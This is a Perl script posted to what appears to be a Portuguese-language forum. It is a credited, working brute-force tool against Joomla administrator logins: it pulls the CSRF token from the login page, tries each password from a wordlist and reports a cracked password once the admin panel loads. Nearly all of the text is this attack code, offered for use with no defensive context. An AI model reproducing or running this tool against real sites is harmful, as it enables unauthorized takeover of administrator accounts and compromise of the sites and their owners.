- Código:
#!/usr/bin/perl
# Coded by MMxM
# [http://the-blackhats.blogspot.com]
use strict;
use warnings;
use WWW::Mechanize;
use Getopt::Long;
our ($host,$user,$wordlist,$token);
sub banner{
print '
____________________________
| |
| Joomla Brute-force by MMxM |
|____________________________|
[http://the-blackhats.blogspot.com]
How to use: '.$0.' [[ -u USER | --user USER ] [ -w PASSFILE | --wordlist PASSFILE ] [ -h HOST[:PORT] | --host HOST[:PORT] ]]
';
exit;
};
sub args{
GetOptions( 'u|user=s' => \$user,
'h|host=s' => \$host,
'w|wordlist=s' => \$wordlist,
) || die &banner;
&banner if (not defined($user)) || (not defined($host)) || (not defined($wordlist));
&brute;
};
sub brute{
open(my $f,"<$wordlist") || die("ERROR: $!");
if($host !~ /^http:\/\//){
$host = 'http://'.$host;
}
print "\n[+] Coder: MMxM [http://the-blackhats.blogspot.com]";
print "\n[+] Starting Brute-force attack";
print "\n[*] Host => $host";
print "\n[*] User => $user";
print "\n[*] Passfile => $wordlist\n\n";
my $url = $host.'/administrator/index.php';
while(<$f>){
chomp($_);
print "[*] Testing => $_\n";
my $mech = WWW::Mechanize->new();
$mech->get($url);
if($mech->content() =~ /([0-9a-fA-F]{32})/){
$token = $1;
} else {
die("\n[-] Error to get security token\n");
}
$mech->submit_form(
fields => {
username => $user,
passwd => $_,
task => 'login',
$token => '1',
}
);
if($mech->content() !~ /com_categories/i){
print "[-] ERROR\n";
} else {
print "\n\t[+] Password Cracked: $_\n\n";
exit;
}
}
print "\n[*] 100% complete\n[-] No Passwords Cracked :/";
exit;
};
&args();
Participe do fórum, é rápido e fácil